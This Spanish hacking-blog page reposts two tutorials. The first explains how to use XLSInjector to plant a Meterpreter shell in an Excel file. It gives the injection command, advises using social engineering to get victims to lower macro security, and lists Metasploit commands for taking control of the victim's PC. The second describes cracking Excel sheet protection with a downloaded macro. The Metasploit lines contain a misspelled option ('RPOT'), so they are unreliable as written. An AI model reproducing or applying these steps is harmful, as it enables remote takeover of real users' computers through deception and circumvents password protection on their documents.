Banner 1

Mostrando entradas con la etiqueta excel. Mostrar todas las entradas
Mostrando entradas con la etiqueta excel. Mostrar todas las entradas

XLSInjector – Inyectar Shell Meterpreter en Archivos Excel

0 comentarios

Es una herramienta creada en perl por keith lee que permite inyectar en un archivo XLS de Microsoft Excel una consola meterpreter (ejecutando todo en la memoria ram sin crear procesos adicionales), permitiéndonos acceder a el remotamente por el puerto 4444 y tomar total control de la maquina.

Para que XLSInjector funcione adecuadamente, necesitamos lo siguiente:

    * Una Maquina (virtual o real) con Windows
    * Microsoft Excel
    * Perl
    * El modulo Win32:OLE para Perl
    * Un archivo XML a infectar
    * El XLSInjector
    * y por ultimo el Metasploit Framework

Después de tener todos los elementos necesarios para el correcto funcionamiento del XLSInjector pasamos a su ejecución, que es bastante simple:
Código:
perl xlsinjector.pl -i ArchivoDeExcel.xls -o ArchivoConShellDeExcel.xls

Pero no todo es tan simple con esta herramienta, resulta que XLSInjector NO salta los filtros de scripting puestos por Microsoft en su suite ofimática, por lo que toca convencer, por medio de ingeniería social o cualquier otra técnica que el mismo usuario ponga la seguridad de las macros en baja y que “confié” en los proyectos de VB, algo complicado pero que seguro con algo de presunción se consigue que realicen estas tareas.

Suponiendo que ya se realizaron las configuraciones adecuadas para el correcto funcionamiento del XLSInjector vamos a acceder remotamente a nuestra shell meterpreter mediante la consola del Metasploit Framework

iniciamos la consola del metasploit:
Código:
set payload windows/meterpreter/bind_tcp
set RHOST ipdelpcvictima
set RPOT 4444
exploit
 
Fuente: http://underc0de.org/foro/hacking-basico/xlsinjector-inyectar-shell-meterpreter-en-archivos-excel/ 

Desproteger Excel

0 comentarios

Este metodo es muy bueno para cuando no tenemos contrasen'a total XD ya me comprenderan.


saludos


PASO 1
Descarguen el archivo llamado “Quitar contraseña hojas protegidas excel.rar”:

PASO 2
Abran el archivo de excel que quieren desproteger.

PASO 3
Creen un nuevo libro de excel (ahora tendrán dos archivos abiertos, OJO no confundan el término “Libro con Hoja” y pónganle el nombre que ustedes quieran por ejemplo “Libro 1″

PASO 4
En el “Libro 1″ presionen “Alt + F11″ (es decir primero presionen la tecla Alt del lado izquierdo del techado, dejenla oprimida y después presionan la techa F11 que se encuentra en la parte superior de su teclado) y les aparecerá una nueva ventana (Visual Basic)

Ir a ARCHIVO > Importar archivo y seleccionar el archivo
llamado “Quitar contraseña hojas protegidas excel.bas” que descargaron en el paso 1.

PASO 5
Ahora vayan al archivo “Libro protegido” y seleccionar la hoja
que quieras desproteger, en esa hoja oprimir “Alt + F8″

Les aparecerá una ventana y ahí eligen la macro “Descubrir contraseñas.bas” también les puede aparecer con el nombre de “Quitar contraseña” y oprimir el botón “Ejecutar”.

PASO 6
Esperen a que termine de buscar la contraseña, tarda aproximadamente 2 minutos o más dependiendo de la capacidad de su computadora (excel se va a quedar trabado durante esos minutos pero no se preocupen).

PASO 7
Cuando se termine el proceso les saldrá un mensaje “La contraseña es: AAABBBBAABA>” por ejemplo

La hoja quedará desprotegida y podran editarla sin problemas

Funciona en todas las versiones de Excel incluyendo 2007

Quitar contraseña hojas protegidas excel.rar

Created By pepae2007


Fuente:http://www.newbie.cl/nb/2009/02/19/desproteger-excel/

Powered by Bad Robot
Helped by Blackubay